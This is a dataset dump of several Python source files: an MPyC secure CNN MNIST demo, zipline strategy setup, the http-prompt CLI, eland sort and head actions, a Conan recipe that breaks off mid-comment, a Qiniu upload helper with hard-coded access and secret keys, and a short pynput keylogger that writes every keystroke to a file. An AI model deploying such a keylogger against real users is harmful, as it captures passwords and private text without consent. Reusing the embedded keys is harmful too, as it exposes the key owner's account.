hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
795abd1dbdbc0837bc1b5dc50b787c3d8106fc72 | 6,940 | py | Python | demos/cnnmnist_plain.py | cyckun/mpyc | ed8546ab20d77b9d612528e82cb1501b85c2b673 | [
"MIT"
] | null | null | null | demos/cnnmnist_plain.py | cyckun/mpyc | ed8546ab20d77b9d612528e82cb1501b85c2b673 | [
"MIT"
] | null | null | null | demos/cnnmnist_plain.py | cyckun/mpyc | ed8546ab20d77b9d612528e82cb1501b85c2b673 | [
"MIT"
] | null | null | null | """ Demo Convolutional Neural Network (CNN) MNIST classifier.
The MNIST dataset of handwritten digits consists of a training set of
60,000 images of a test set of 10,000 images. The training images have been
used in the clear to obtain a highly reliable CNN classifier. The demo
feeds the classifier with random test images keeping both the CNN parameters
(neuron weights and bias for all layers) and the test image secret.
The secure CNN classifier is run either with scaled secure integers or
with secure fixed-point numbers. Barriers are used to throttle the MPyC
secure computation (reduces memory usage).
"""
import os
import sys
import logging
import random
import gzip
import numpy as np
from mpyc.runtime import mpc
# Secure number type (SecInt or SecFxp); selected at runtime in main().
secnum = None


def scale_to_int(f):
    """Return a vectorized converter mapping plain numbers into ``secnum``.

    For secure integers the value is scaled by ``f`` and rounded; for
    secure fixed-point numbers it is passed through as a float.
    """
    if issubclass(secnum, mpc.Integer):
        def convert(a):
            return secnum(int(round(a * f)))  # force Python integers
    else:
        def convert(a):
            return secnum(float(a))  # force Python floats
    return np.vectorize(convert)
def load(name, f, a=2):
    """Load and secret-share the weights and bias of layer *name*.

    Weights are scaled by 2**f, biases by 2**(a*f) to match the scale of
    the accumulated products feeding into them.
    """
    weights = np.load(os.path.join('data', 'cnn', 'W_' + name + '.npy'))
    weights = scale_to_int(1 << f)(weights)
    bias = np.load(os.path.join('data', 'cnn', 'b_' + name + '.npy'))
    bias = scale_to_int(1 << (a * f))(bias)
    return weights, bias
def dim(x):
    """Return the dimensions of tensor ``x`` as a list.

    ``x`` may be a numpy array (its shape is returned) or arbitrarily
    nested Python lists (sizes along the first elements are collected).
    """
    if isinstance(x, np.ndarray):
        return list(x.shape)
    dims = []
    level = x
    while isinstance(level, list):
        dims.append(len(level))
        level = level[0]
    return dims
@mpc.coroutine
async def convolvetensor(x, W, b):
    """Secure 2D convolution layer.

    x: k images of r channels, each m*n.  W: v filters of r channels,
    each s*s.  b: bias vector of dimension v.  Returns a k*v*m*n tensor
    of secure numbers of the same type as the entries of x.
    """
    logging.info('- - - - - - - - conv2d - - - - - - -')
    # 2D convolutions on m*n sized images from X with s*s sized filters from W.
    # b is of dimension v
    k, r, m, n = dim(x)
    x = x.tolist()
    v, r, s, s = dim(W)
    W = W.tolist()
    stype = type(x[0][0][0][0])
    await mpc.returnType(stype, k, v, m, n)
    x, W, b = await mpc.gather(x, W, b)
    # Initialize every output map with its bias b[j], then accumulate the
    # per-channel convolutions on top.
    Y = [[[[b[j]]*m for _ in range(n)] for j in range(v)] for _ in range(k)]
    counter = 0
    for i in range(k):
        for j in range(v):
            for l in range(r):
                counter += 1
                if counter % 500 == 0:
                    # Periodic barrier throttles the MPyC computation
                    # (bounds memory usage, per the module docstring).
                    await mpc.barrier()
                Y[i][j] = mpc.matrix_add(Y[i][j], inprod2D(x[i][l], W[j][l]))
    # Reshare row by row after the raw share products computed in inprod2D
    # (presumably degree reduction — see MPyC internals; TODO confirm).
    for i in range(k):
        for j in range(v):
            for im in range(m):
                Y[i][j][im] = mpc._reshare(Y[i][j][im])
    Y = await mpc.gather(Y)
    if issubclass(stype, mpc.FixedPoint):
        # Fixed-point products carry an extra frac_length bits; truncate back.
        l = stype.bit_length
        Y = [[[mpc.trunc(y, f=stype.frac_length, l=l) for y in _] for _ in _] for _ in Y]
        Y = await mpc.gather(Y)
    return Y
    # k, v, m, n = dim(Y)
def inprod2D(X, W):
    """2D correlation of image X with filter W (zero padding, same-size output).

    X is an m*n list of lists of share objects (``.value`` holds the raw
    share); W is an s*s filter of the same element type.  Returns an m*n
    list of lists of raw accumulated products.
    """
    m, n = len(X), len(X[0])
    s = len(W)  # W is an s * s filter
    half = (s - 1) // 2
    out = []
    for i in range(m):
        row = []
        for j in range(n):
            acc = 0
            for di in range(s):
                ix = i - half + di
                if not 0 <= ix < m:
                    continue  # off the top/bottom edge: zero padding
                for dj in range(s):
                    jx = j - half + dj
                    if 0 <= jx < n:
                        acc += X[ix][jx].value * W[di][dj].value
            row.append(acc)
        out.append(row)
    return out
def tensormatrix_prod(x, W, b):
    """Fully connected layer: compute z @ W + b for every sample z in x."""
    logging.info('- - - - - - - - fc - - - - - - -')
    W, b = W.tolist(), b.tolist()
    result = []
    for z in x:
        product = mpc.matrix_prod([z.tolist()], W)[0]
        result.append(mpc.vector_add(product, b))
    return result
def maxpool(x):
    """2x2 max pooling with stride 2 on every channel image in x."""
    logging.info('- - - - - - - - maxpool - - - - - - -')
    # maxpooling 2 * 2 squares in images of size m * n with stride 2
    k, r, m, n = dim(x)
    pooled = [[[[mpc.max(img[i][j], img[i][j+1], img[i+1][j], img[i+1][j+1])
                 for j in range(0, n, 2)]
                for i in range(0, m, 2)]
               for img in sample]
              for sample in x]
    return np.array(pooled)
def ReLU(x):
    """Apply the rectifier max(a, 0) elementwise, via (a >= 0) * a."""
    logging.info('- - - - - - - - ReLU - - - - - - -')

    def rectify(a):
        return (a >= 0) * a

    return np.vectorize(rectify)(x)
async def main():
    """Run the secure CNN classifier on a batch of MNIST test images.

    sys.argv[1] (optional) is the batch size; a fractional .5 part selects
    secure fixed-point numbers instead of secure integers.  sys.argv[2]
    (optional) fixes the offset of the first test image.
    """
    global secnum

    k = 1 if len(sys.argv) == 1 else float(sys.argv[1])
    if k - int(k) == 0.5:
        secnum = mpc.SecFxp(10, 4)
    else:
        secnum = mpc.SecInt(37)
    batch_size = round(k - 0.01)

    await mpc.start()

    if len(sys.argv) <= 2:
        # Party 0 picks a random offset and shares it with the other parties.
        offset = random.randrange(10001 - batch_size) if mpc.pid == 0 else None
        offset = await mpc.transfer(offset, senders=0)
    else:
        offset = int(sys.argv[2])

    # f: number of fractional bits used when scaling plain values to integers.
    f = 6

    logging.info('--------------- INPUT -------------')
    print(f'Type = {secnum.__name__}, range = ({offset}, {offset + batch_size})')
    # read batch_size labels and images at given offset
    df = gzip.open(os.path.join('data', 'cnn', 't10k-labels-idx1-ubyte.gz'))
    d = df.read()[8 + offset: 8 + offset + batch_size]
    labels = list(map(int, d))
    print('Labels:', labels)
    df = gzip.open(os.path.join('data', 'cnn', 't10k-images-idx3-ubyte.gz'))
    d = df.read()[16 + offset * 28**2: 16 + (offset + batch_size) * 28**2]
    print("type d:", type(d))
    # Normalize raw pixel bytes to [0, 1].
    x = list(map(lambda a: a/255, d))
    print("x= ", x)
    x = np.array(x).reshape(batch_size, 1, 28, 28)
    if batch_size == 1:
        # ASCII-art preview of the single input image.
        print(np.array2string(np.vectorize(lambda a: int(bool(a)))(x[0, 0]), separator=''))
    # above is plain, below is cipher;
    print("length of x:", len(x), sys.getsizeof(x))
    x = scale_to_int(1 << f)(x)  # convert plain to cipher;

    logging.info('--------------- LAYER 1 -------------')
    W, b = load('conv1', f)
    x = convolvetensor(x, W, b)
    await mpc.barrier()
    if issubclass(secnum, mpc.Integer):
        # Grow the secure integer bit length as intermediate values grow.
        secnum.bit_length = 16
    x = maxpool(x)
    await mpc.barrier()
    x = ReLU(x)
    await mpc.barrier()

    logging.info('--------------- LAYER 2 -------------')
    W, b = load('conv2', f, 3)
    x = convolvetensor(x, W, b)
    await mpc.barrier()
    if issubclass(secnum, mpc.Integer):
        secnum.bit_length = 23
    x = maxpool(x)
    await mpc.barrier()
    x = ReLU(x)
    await mpc.barrier()

    logging.info('--------------- LAYER 3 -------------')
    # Flatten the 64 pooled 7x7 feature maps for the fully connected layer.
    x = x.reshape(batch_size, 64 * 7**2)
    W, b = load('fc1', f, 4)
    x = tensormatrix_prod(x, W, b)
    if issubclass(secnum, mpc.Integer):
        secnum.bit_length = 30
    x = ReLU(x)
    await mpc.barrier()

    logging.info('--------------- LAYER 4 -------------')
    W, b = load('fc2', f, 5)
    x = tensormatrix_prod(x, W, b)

    logging.info('--------------- OUTPUT -------------')
    if issubclass(secnum, mpc.Integer):
        secnum.bit_length = 37
    for i in range(batch_size):
        tmp = mpc.argmax(x[i])[0]  # (index, x[index]), tmp is index;
        print("tmp:", tmp, mpc.argmax(x[i])[1].share)
        prediction = int(await mpc.output(tmp))
        error = '******* ERROR *******' if prediction != labels[i] else ''
        print(f'Image #{offset+i} with label {labels[i]}: {prediction} predicted. {error}')
        print(await mpc.output(x[i]))

    await mpc.shutdown()
if __name__ == '__main__':
    # Drive the MPyC event loop until main() completes.
    mpc.run(main())
| 31.545455 | 91 | 0.530259 |
795abdb9b781178d184fd2bc2305f52f575b3ddf | 1,596 | py | Python | pluto/strategies/setup.py | chalant/pluto | e7bfd35a2c1fc0e0753bd2f840b0a4385b5124fc | [
"Apache-2.0"
] | null | null | null | pluto/strategies/setup.py | chalant/pluto | e7bfd35a2c1fc0e0753bd2f840b0a4385b5124fc | [
"Apache-2.0"
] | null | null | null | pluto/strategies/setup.py | chalant/pluto | e7bfd35a2c1fc0e0753bd2f840b0a4385b5124fc | [
"Apache-2.0"
] | null | null | null | from sqlalchemy import text
from zipline.finance import cancel_policy
_GET_STRATEGY_SETUP = text(
"""
SELECT * FROM strategy_setup
WHERE strategy_id=:strategy_id
""")
_SAVE_STRATEGY_SETUP = text(
"""
INSERT OR REPLACE INTO strategies
VALUES
""")
_SAVE_STRATEGY_ASSET_CLASS = text(
"""
INSERT OR REPLACE INTO strategy_asset_classes
VALUES
"""
)
class StrategySetup(object):
    """Default configuration for a trading strategy.

    Attributes are initialized to defaults and may be overwritten from
    persisted values by get_strategy_setup().
    """

    def __init__(self, strategy_id):
        self.__strategy_id = strategy_id
        self.look_back = 150            # look-back window length
        self.shorting = True            # whether short positions are allowed
        self.asset_classes = 'equity'   # comma-separated asset class names
        self.data_frequency = 'daily'
        self.fractional = False
        # BUG FIX: cancel_policy was assigned twice (first the string
        # 'never cancel', then immediately overwritten by the policy
        # object); keep only the effective assignment.
        self.cancel_policy = cancel_policy.NeverCancel()

    @property
    def strategy_id(self):
        """Identifier of the strategy this setup belongs to (read-only)."""
        return self.__strategy_id
def get_strategy_setup(connection, strategy_id):
    """Load the persisted setup for *strategy_id*, falling back to defaults.

    Returns a StrategySetup whose look_back/shorting fields are overridden
    from the database row when one exists.
    """
    stp = StrategySetup(strategy_id)
    # BUG FIX: the query text was missing — connection.execute() was
    # called with only the bind parameter, so no statement was executed.
    res = connection.execute(
        _GET_STRATEGY_SETUP,
        strategy_id=strategy_id)
    if res:
        stp.look_back = res['look_back']
        stp.shorting = res['shorting']
    return stp
def save_strategy_setup(connection, strategy_setup):
    """Persist a strategy setup plus one row per asset class.

    NOTE(review): _SAVE_STRATEGY_SETUP carries no VALUES placeholders and
    the strategy_id is not bound in the first execute() — the statements
    appear incomplete; verify before relying on this function.
    """
    connection.execute(
        _SAVE_STRATEGY_SETUP,
        look_back=strategy_setup.look_back,
        shorting=strategy_setup.shorting,
        data_frequency=strategy_setup.data_frequency
    )
    # asset_classes is a comma-separated string, e.g. "equity,forex".
    for asset_class in strategy_setup.asset_classes.split(","):
        connection.execute(
            _SAVE_STRATEGY_ASSET_CLASS,
            asset_class=asset_class,
            strategy_id=strategy_setup.strategy_id
        )
795abdd3aa0e624f4df1b77729d950a10efce1e5 | 5,422 | py | Python | http_prompt/cli.py | KiranBaktha/http-prompt | 87f1e9d82f790bcee650b2cbb377b07c8ed3f20b | [
"MIT"
] | null | null | null | http_prompt/cli.py | KiranBaktha/http-prompt | 87f1e9d82f790bcee650b2cbb377b07c8ed3f20b | [
"MIT"
] | null | null | null | http_prompt/cli.py | KiranBaktha/http-prompt | 87f1e9d82f790bcee650b2cbb377b07c8ed3f20b | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
import json
import os
import re
import sys
import click
from httpie.plugins import FormatterPlugin # noqa, avoid cyclic import
from httpie.output.formatters.colors import Solarized256Style
from prompt_toolkit import prompt, AbortAction
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.history import FileHistory
from prompt_toolkit.layout.lexers import PygmentsLexer
from prompt_toolkit.styles.from_pygments import style_from_pygments
from pygments.styles import get_style_by_name
from pygments.util import ClassNotFound
from six.moves.http_cookies import SimpleCookie
from six.moves.urllib.request import urlopen, pathname2url
from . import __version__
from . import config
from .completer import HttpPromptCompleter
from .context import Context
from .contextio import load_context, save_context
from .execution import execute
from .lexer import HttpPromptLexer
from .utils import smart_quote
from .xdg import get_data_dir
# XXX: http://click.pocoo.org/python3/#unicode-literals
# Silence click's warning about the unicode_literals future import.
click.disable_unicode_literals_warning = True
def fix_incomplete_url(url):
    """Complete a partially typed URL with an http scheme.

    Handles truncated prefixes such as 's://host', '://host' and
    '//host'; anything without an http(s) scheme gets 'http://' prepended.
    """
    if url.startswith(('s://', '://')):
        return 'http' + url
    if url.startswith('//'):
        return 'http:' + url
    if not url.startswith(('http://', 'https://')):
        return 'http://' + url
    return url
def update_cookies(base_value, cookies):
    """Merge *cookies* (a name->value mapping) into an existing Cookie
    header value and return the combined header string."""
    jar = SimpleCookie(base_value)
    for name, value in cookies.items():
        jar[name] = value
    return jar.output(header='', sep=';').lstrip()
class ExecutionListener(object):
    """Callbacks invoked around command execution: persists the context
    and optionally folds response cookies into the Cookie header."""

    def __init__(self, cfg):
        self.cfg = cfg

    def context_changed(self, context):
        """Dump the current context to HTTP Prompt format."""
        save_context(context)

    def _should_set_cookies(self):
        # 'auto' sets cookies silently; 'ask' prompts the user first.
        pref = self.cfg.get('set_cookies') or 'auto'
        if pref == 'auto':
            return True
        return pref == 'ask' and click.confirm(
            "Cookies incoming! Do you want to set them?")

    def response_returned(self, context, response):
        """Merge cookies from *response* into the context's Cookie header."""
        if not response.cookies:
            return
        if not self._should_set_cookies():
            return
        merged = update_cookies(context.headers.get('Cookie'),
                                response.cookies)
        context.headers['Cookie'] = merged
        click.secho('Cookies set: %s' % merged)
def normalize_url(ctx, param, value):
    """Click option callback: turn a spec argument into a URL.

    Values that already carry a scheme are returned unchanged; bare
    filesystem paths are converted to file: URLs.  Empty values yield None.
    """
    if not value:
        return None
    if re.search(r'^\w+://', value):
        return value
    return 'file:' + pathname2url(os.path.abspath(value))
@click.command(context_settings=dict(
    ignore_unknown_options=True,
))
@click.option('--spec', help="OpenAPI/Swagger specification file.",
              callback=normalize_url)
@click.option('--env', help="Environment file to preload.",
              type=click.Path(exists=True))
@click.argument('url', default='')
@click.argument('http_options', nargs=-1, type=click.UNPROCESSED)
@click.version_option(message='%(version)s')
def cli(spec, env, url, http_options):
    """Entry point: configure the interactive HTTP Prompt REPL and run it
    until EOF (Ctrl-D) or an exit command."""
    click.echo('Version: %s' % __version__)

    copied, config_path = config.initialize()
    if copied:
        click.echo('Config file not found. Initialized a new one: %s' %
                   config_path)

    cfg = config.load()

    # Override pager/less options
    os.environ['PAGER'] = cfg['pager']
    os.environ['LESS'] = '-RXF'

    if spec:
        # spec is a URL at this point (see normalize_url); fetch and parse it.
        f = urlopen(spec)
        try:
            content = f.read().decode('utf-8')
            try:
                spec = json.loads(content)
            except json.JSONDecodeError:
                click.secho("Warning: Specification file '%s' is not JSON" %
                            spec, err=True, fg='red')
                spec = None
        finally:
            f.close()

    if url:
        url = fix_incomplete_url(url)
    context = Context(url, spec=spec)

    output_style = cfg.get('output_style')
    if output_style:
        context.options['--style'] = output_style

    # For prompt-toolkit
    history = FileHistory(os.path.join(get_data_dir(), 'history'))

    lexer = PygmentsLexer(HttpPromptLexer)
    completer = HttpPromptCompleter(context)
    try:
        style_class = get_style_by_name(cfg['command_style'])
    except ClassNotFound:
        # Unknown pygments style name in the config: fall back to default.
        style_class = Solarized256Style
    style = style_from_pygments(style_class)

    listener = ExecutionListener(cfg)

    if len(sys.argv) == 1:
        # load previous context if nothing defined
        load_context(context)
    else:
        if env:
            load_context(context, env)
            if url:
                # Overwrite the env url if not default
                context.url = url
        if http_options:
            # Execute HTTPie options from CLI (can overwrite env file values)
            http_options = [smart_quote(a) for a in http_options]
            execute(' '.join(http_options), context, listener=listener)

    # Main read-eval-print loop.
    while True:
        try:
            text = prompt('%s> ' % context.url, completer=completer,
                          lexer=lexer, style=style, history=history,
                          auto_suggest=AutoSuggestFromHistory(),
                          on_abort=AbortAction.RETRY, vi_mode=cfg['vi'])
        except EOFError:
            break  # Control-D pressed
        else:
            execute(text, context, listener=listener, style=style_class)
            if context.should_exit:
                break

    click.echo("Goodbye!")
| 31.707602 | 77 | 0.644596 |
795abe90256ca40e56815b2b02ba73b0c8692fd3 | 606 | py | Python | info/utils/image_storage.py | gottuantuan/info_got | 80ee1e7005a7ee9d9fea20f84b5636cc3cc7c527 | [
"MIT"
] | null | null | null | info/utils/image_storage.py | gottuantuan/info_got | 80ee1e7005a7ee9d9fea20f84b5636cc3cc7c527 | [
"MIT"
] | null | null | null | info/utils/image_storage.py | gottuantuan/info_got | 80ee1e7005a7ee9d9fea20f84b5636cc3cc7c527 | [
"MIT"
] | null | null | null | from qiniu import Auth, put_data
# NOTE(review): hard-coded Qiniu credentials checked into source control —
# move them to environment variables / a config file and rotate the keys.
access_key = 'XSOF7q0mcz3NkFDeXoiKL1SliQswpGp5sSvD44Pu'
secret_key = '1zTYK17VvDIvFHEILU-gp89bM3c4FPTFF7DtISsj'
bucket_name = 'infogot'
def storage(data):
    """Upload raw image bytes to the Qiniu bucket and return the storage key.

    Raises whatever the Qiniu client raises on transport failure, and a
    plain Exception when the upload returns a non-200 status.
    """
    try:
        q = Auth(access_key, secret_key)
        token = q.upload_token(bucket_name)
        ret, info = put_data(token, None, data)
        print(ret, info)
    except Exception:
        # BUG FIX: was `raise e;` — stray semicolon, and re-raising by name
        # loses traceback detail; a bare raise re-raises the original as-is.
        raise
    if info.status_code != 200:
        raise Exception("上传图片失败")
    return ret["key"]
if __name__ == '__main__':
    # Manual test helper: read a local file path and upload its contents.
    file = input('请输入文件路径')
    with open(file, 'rb') as f:
        storage(f.read())
795ac0a74c8a6c463c7404890792d7708073e868 | 3,287 | py | Python | eland/actions.py | redNixon/eland | 1b9cb1db6d30f0662fe3679c7bb31e2c0865f0c3 | [
"Apache-2.0"
] | null | null | null | eland/actions.py | redNixon/eland | 1b9cb1db6d30f0662fe3679c7bb31e2c0865f0c3 | [
"Apache-2.0"
] | null | null | null | eland/actions.py | redNixon/eland | 1b9cb1db6d30f0662fe3679c7bb31e2c0865f0c3 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Elasticsearch BV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import ABC, abstractmethod
# -------------------------------------------------------------------------------------------------------------------- #
# PostProcessingActions #
# -------------------------------------------------------------------------------------------------------------------- #
from eland import SortOrder
class PostProcessingAction(ABC):
    """Base class for post-processing actions applied to a DataFrame."""

    def __init__(self, action_type):
        """
        Parameters
        ----------
        action_type: str
            The action type (e.g. sort_index, head etc.)
        """
        self._action_type = action_type

    @property
    def type(self):
        """str: tag identifying this action."""
        return self._action_type

    @abstractmethod
    def resolve_action(self, df):
        """Apply this action to *df* and return the result."""

    @abstractmethod
    def __repr__(self):
        """Debug representation of the action."""
class SortIndexAction(PostProcessingAction):
    """Post-processing action that sorts the frame by its index."""

    def __init__(self):
        super().__init__("sort_index")

    def resolve_action(self, df):
        """Return *df* sorted by index."""
        return df.sort_index()

    def __repr__(self):
        return "('" + self.type + "')"
class HeadAction(PostProcessingAction):
    """Post-processing action that keeps only the first *count* rows."""

    def __init__(self, count):
        super().__init__("head")
        self._count = count

    def resolve_action(self, df):
        """Return the first ``self._count`` rows of *df*."""
        return df.head(self._count)

    def __repr__(self):
        return "('%s': ('count': %s))" % (self.type, self._count)
class TailAction(PostProcessingAction):
    """Post-processing action that keeps only the last *count* rows."""

    def __init__(self, count):
        super().__init__("tail")
        self._count = count

    def resolve_action(self, df):
        """Return the last ``self._count`` rows of *df*."""
        return df.tail(self._count)

    def __repr__(self):
        return "('%s': ('count': %s))" % (self.type, self._count)
class SortFieldAction(PostProcessingAction):
    """Post-processing action sorting on one field, parsed from an
    Elasticsearch-style "field:direction" string."""

    def __init__(self, sort_params_string):
        super().__init__("sort_field")
        if sort_params_string is None:
            raise ValueError("Expected valid string")

        # Expect exactly "<field>:<asc|desc>".
        parts = sort_params_string.split(":")
        if len(parts) != 2:
            raise ValueError(
                f"Expected ES sort params string (e.g. _doc:desc). Got '{sort_params_string}'"
            )

        field, order = parts
        self._sort_field = field
        self._sort_order = SortOrder.from_string(order)

    def resolve_action(self, df):
        """Return *df* sorted on the configured field and direction."""
        ascending = self._sort_order == SortOrder.ASC
        return df.sort_values(self._sort_field, ascending)

    def __repr__(self):
        return (
            f"('{self.type}': ('sort_field': '{self._sort_field}', "
            f"'sort_order': {self._sort_order}))"
        )
| 30.155963 | 120 | 0.573471 |
795ac14dbcafb874c7b61401ca244826dc3458a6 | 464 | py | Python | key_logger.py | SebastianOhberg/keylogger | 666b1c7ffdd29976aee708bb14c8637803e41102 | [
"MIT"
] | null | null | null | key_logger.py | SebastianOhberg/keylogger | 666b1c7ffdd29976aee708bb14c8637803e41102 | [
"MIT"
] | null | null | null | key_logger.py | SebastianOhberg/keylogger | 666b1c7ffdd29976aee708bb14c8637803e41102 | [
"MIT"
] | null | null | null | import datetime
from pynput.keyboard import Listener
# Timestamped log file name, e.g. keylogger_2024-01-01_12-00-00.txt.
d = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
# NOTE(review): the file handle stays open for the process lifetime and is
# never explicitly flushed or closed.
f = open('keylogger_{}.txt'.format(d), 'w')
def key_recorder(key):
    """Append a readable token for the pressed *key* to the global log file."""
    name = str(key)
    special = {
        'Key.enter': '\n',
        'Key.space': ' ',
        'Key.backspace': '%BORRAR%',
    }
    if name in special:
        f.write(special[name])
    else:
        # Character keys stringify as 'x'; strip the surrounding quotes.
        f.write(name.replace("'", ""))
# Block on the keyboard listener thread, recording every key press.
with Listener(on_press=key_recorder) as l:
    l.join()
795ac2da37e1dcf26c60717615a95bb48a31ba3e | 9,112 | py | Python | recipes/diligent-core/all/conanfile.py | dssimonspoerri/conan-center-index | 83f1cbeb0407382be1c4011e66ca5cdaa634b18d | [
"MIT"
] | null | null | null | recipes/diligent-core/all/conanfile.py | dssimonspoerri/conan-center-index | 83f1cbeb0407382be1c4011e66ca5cdaa634b18d | [
"MIT"
] | null | null | null | recipes/diligent-core/all/conanfile.py | dssimonspoerri/conan-center-index | 83f1cbeb0407382be1c4011e66ca5cdaa634b18d | [
"MIT"
] | null | null | null | from conans import ConanFile, tools, CMake
from conans.errors import ConanInvalidConfiguration
import os
required_conan_version = ">=1.33.0"


class DiligentCoreConan(ConanFile):
    """Conan recipe building DiligentCore, a cross-platform low-level
    graphics API, as static libraries (with optional shared artifacts)."""

    name = "diligent-core"
    url = "https://github.com/conan-io/conan-center-index"
    homepage = "https://github.com/DiligentGraphics/DiligentCore"
    description = "Diligent Core is a modern cross-platfrom low-level graphics API."
    license = "Apache-2.0"
    # BUG FIX: was ("graphics"), which is just a parenthesized string —
    # topics must be a tuple.
    topics = ("graphics",)
    settings = "os", "compiler", "build_type", "arch"
    options = {
        "shared": [True, False],
        "fPIC": [True, False],
    }
    default_options = {
        "shared": False,
        "fPIC": True,
    }
    generators = "cmake_find_package", "cmake", "cmake_find_package_multi"
    _cmake = None
    exports_sources = ["CMakeLists.txt", "patches/**"]
    short_paths = True

    @property
    def _source_subfolder(self):
        return "source_subfolder"

    @property
    def _build_subfolder(self):
        return "build_subfolder"

    @property
    def _minimum_compilers_version(self):
        # Oldest compiler versions known to build the C++14 code base.
        return {
            "Visual Studio": "16",
            "gcc": "6",
            "clang": "3.4",
            "apple-clang": "5.1",
        }

    @property
    def _minimum_cpp_standard(self):
        return 14

    def validate(self):
        """Reject configurations that cannot build this package."""
        if self.settings.compiler.get_safe("cppstd"):
            tools.check_min_cppstd(self, self._minimum_cpp_standard)
        min_version = self._minimum_compilers_version.get(str(self.settings.compiler))
        if not min_version:
            self.output.warn("{} recipe lacks information about the {} compiler support.".format(
                self.name, self.settings.compiler))
        else:
            if tools.Version(self.settings.compiler.version) < min_version:
                raise ConanInvalidConfiguration("{} requires C++{} support. The current compiler {} {} does not support it.".format(
                    self.name, self._minimum_cpp_standard, self.settings.compiler, self.settings.compiler.version))
        if self.settings.compiler == "Visual Studio" and "MT" in self.settings.compiler.runtime:
            raise ConanInvalidConfiguration("Visual Studio build with MT runtime is not supported")

    def source(self):
        tools.get(**self.conan_data["sources"][self.version], strip_root=True, destination=self._source_subfolder)

    def package_id(self):
        # Collapse debug/release MSVC runtimes so one package id serves both.
        if self.settings.compiler == "Visual Studio":
            if "MD" in self.settings.compiler.runtime:
                self.info.settings.compiler.runtime = "MD/MDd"
            else:
                self.info.settings.compiler.runtime = "MT/MTd"

    def configure(self):
        if self.options.shared:
            del self.options.fPIC

    def config_options(self):
        # fPIC is meaningless on Windows.
        if self.settings.os == "Windows":
            del self.options.fPIC

    def _patch_sources(self):
        for patch in self.conan_data["patches"][self.version]:
            tools.patch(**patch)

    def build_requirements(self):
        self.build_requires("cmake/3.22.0")

    def requirements(self):
        self.requires("opengl/system")
        self.requires("libjpeg/9d")
        self.requires("libtiff/4.3.0")
        self.requires("zlib/1.2.11")
        self.requires("libpng/1.6.37")
        self.requires("spirv-cross/cci.20210930")
        self.requires("spirv-tools/1.3.204.0")
        self.requires("vulkan-headers/1.3.204")
        self.requires("volk/1.3.204")
        self.requires("glslang/1.3.204.0")
        self.requires("xxhash/0.8.0")
        if self.settings.os in ["Linux", "FreeBSD"]:
            self.requires("xorg/system")
            if not tools.cross_building(self, skip_x64_x86=True):
                self.requires("xkbcommon/1.3.1")

    def _diligent_platform(self):
        # Map the Conan OS setting onto Diligent's PLATFORM_* define.
        if self.settings.os == "Windows":
            return "PLATFORM_WIN32"
        elif self.settings.os == "Macos":
            return "PLATFORM_MACOS"
        elif self.settings.os == "Linux":
            return "PLATFORM_LINUX"
        elif self.settings.os == "Android":
            return "PLATFORM_ANDROID"
        elif self.settings.os == "iOS":
            return "PLATFORM_IOS"
        elif self.settings.os == "Emscripten":
            return "PLATFORM_EMSCRIPTEN"
        elif self.settings.os == "watchOS":
            return "PLATFORM_TVOS"

    def _configure_cmake(self):
        # Lazily create and cache the CMake helper.
        if self._cmake:
            return self._cmake
        self._cmake = CMake(self)
        self._cmake.definitions["DILIGENT_BUILD_SAMPLES"] = False
        self._cmake.definitions["DILIGENT_NO_FORMAT_VALIDATION"] = True
        self._cmake.definitions["DILIGENT_BUILD_TESTS"] = False
        self._cmake.definitions["DILIGENT_NO_DXC"] = True
        self._cmake.definitions["SPIRV_CROSS_NAMESPACE_OVERRIDE"] = self.options["spirv-cross"].namespace
        self._cmake.definitions["BUILD_SHARED_LIBS"] = False
        self._cmake.definitions["ENABLE_RTTI"] = True
        self._cmake.definitions["ENABLE_EXCEPTIONS"] = True
        self._cmake.definitions[self._diligent_platform()] = True
        self._cmake.configure(build_folder=self._build_subfolder)
        return self._cmake

    def build(self):
        self._patch_sources()
        cmake = self._configure_cmake()
        cmake.build()

    def package(self):
        cmake = self._configure_cmake()
        cmake.install()
        tools.rename(src=os.path.join(self.package_folder, "include", "source_subfolder"),
                     dst=os.path.join(self.package_folder, "include", "DiligentCore"))
        tools.rmdir(os.path.join(self.package_folder, "Licenses"))
        tools.rmdir(os.path.join(self.package_folder, "lib"))
        tools.rmdir(os.path.join(self.package_folder, "bin"))
        self.copy("License.txt", dst="licenses", src=self._source_subfolder)
        if self.options.shared:
            self.copy(pattern="*.dylib", dst="lib", keep_path=False)
            self.copy(pattern="*.so", dst="lib", keep_path=False)
            self.copy(pattern="*.dll", dst="bin", keep_path=False)
            tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.a")
            # BUG FIX: was `if self.settings.os is not "Windows":` — identity
            # comparison against a string literal is always True for a
